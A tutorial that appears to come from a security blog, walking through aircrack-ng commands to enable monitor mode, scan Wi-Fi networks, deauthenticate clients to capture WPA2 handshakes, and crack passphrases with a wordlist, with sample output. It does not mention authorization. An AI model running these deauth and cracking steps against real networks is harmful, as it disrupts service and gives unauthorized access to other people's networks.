This post will show how to get started using aircrack-ng to discover wi-fi networks, capture handshakes, deauth clients, and crack passwords.
- Setup airmon-ng
- Capturing Packets
- Deauthing Users
- Crack Passwords
If you’re using Kali this should come pre-installed, but if not, you can install all the required tools using:
1 sudo apt install aircrack-ng
The first step will be to enable monitor mode on our wi-fi card. Assuming our wireless network adaptor is
wlan0, we put our card into monitor mode using:
1 airmon-ng start wlan0
You should now have a new wireless network adaptor that has the same name with
mon appended to the end. So our adaptor will be called
Additionally, you made need to kill some processes that can cause issues. This can be done using:
1 airmon-ng check kill
We can begin a basic capture and log the results. This will allow us to cycle through the wifi channels and discover Access Points and Clients.
1 airodump-ng -w wifiScan1 wlan0mon
-wspecifies the output files.
- This ONLY listens on 2.4Ghz range.
From the above command you’ll see two separate tables. For the first table:
|BSSID||MAC address of the AP|
|ESSID||Name of the Wi-Fi Network|
|Beacons||Number of Beacon Frames received from the AP|
|CH||The current channel of the AP|
|ENC, CIPHER & AUTH||Encryption & Authentication details|
For the second table:
|BSSID||MAC address of the AP the client is communicating with|
|Station||MAC address of the client|
|Frames||Data Frames received from the client|
|Probes||Wi-Fi network the client is communicating with|
After seeing what networks are around, we can target specific channels and ESSIDs. Let’s say our target wi-fi network is
TestWifi, and is using channel
1 airodump-ng -a -c 4 --essid "TestWifi" -w wifiScan2 wlan0mon
-aonly show associated clients
-c 4only capture on channel 4
--essid "TestWifi"only show APs with the ESSID of “TestWifi”
1 2 3 4 5 6 7 8 9 CH 4 ][ Elapsed: 1 min ][ 2022-02-05 12:06 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 11:22:33:44:55:66 -28 100 594 799 0 4 130 WPA2 CCMP PSK TestWifi BSSID STATION PWR Rate Lost Frames Notes Probes 11:22:33:44:55:66 22:44:66:88:33:55 -41 12e-24 34 977 TestWifi
Because we are saving the output, there will be a capture file
.cap included as part of this. However, unless a client connects while we are listening, we won’t have any handshakes recorded.
If there are already clients connected, we can attempt to forcible disconnect them and listen for the handshake when they re-connect.
While the previous command is running and we’re capturing handshakes , we can open another terminal and de-auth an AP, or a specific client connected to an AP.
Target an AP:
1 aireplay-ng -0 10 -a 11:22:33:44:55:66 wlan0mon
-0 10deauth mode and perform the deauth attack 10 times.
-aMAC address of the AP.
Target a Client connected to an AP:
1 aireplay-ng -0 10 -a 11:22:33:44:55:66 -c 22:44:66:88:33:55 wlan0mon
-cMAC address of the client
After performing this attack, the capture should be left running for at least a few minutes to allow the clients to re-connect.
Assuming our attack was successful, we can analyse the output
.cap file for handshakes and attempt to crack them offline. Let’s analyse the output file
wifiScan2-01.cap from our previous capture and attempt to crack the password using the rockyou word list:
1 aircrack-ng wifiScan2-01.cap -w rockyou.txt
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 Reading packets, please wait... Opening wifiScan2-01.cap Read 6966 packets. # BSSID ESSID Encryption 1 11:22:33:44:55:66 TestWifi WPA (1 handshake, with PMKID) Choosing first network as target. Reading packets, please wait... Opening wifiScan2-01.cap Read 6966 packets. 1 potential targets
- Normally you would be ask which target you want to crack, however, since there is only 1 it will automatically selected.
The cracking will now start:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 Aircrack-ng 1.6 [00:00:04] 78245/14344391 keys tested (20290.49 k/s) Time left: 11 minutes, 43 seconds 0.55% Current passphrase: sukiyaki Master Key : 23 17 DE 4E 8C FC 74 67 82 3F 04 E9 0A 22 CE 25 FD 01 FA DB 29 D2 3A 2C 79 F0 7D 05 36 DA 48 1B Transient Key : E9 B7 AD 37 73 E5 A5 15 24 30 7A F0 64 AF 3B 14 EB 68 02 69 EE D2 C4 DF 80 C6 9F E6 11 00 E2 A8 FF 8A 66 56 85 AE FE B3 31 06 16 AC 6B 1A E1 DA AB 21 AA 22 C9 9E 42 3E 3D ED 28 C1 F7 F1 AE E3 EAPOL HMAC : B8 16 E5 77 E5 AB BD B6 1A 3A 69 A3 19 1C 21 C4
The above attack is running at around 20 thousand keys per second. This is running on a Intel Core i7 8700. We can improve the performance a lot by using Hashcat instead of aircrack-ng to crack the password. You can read how to do that here.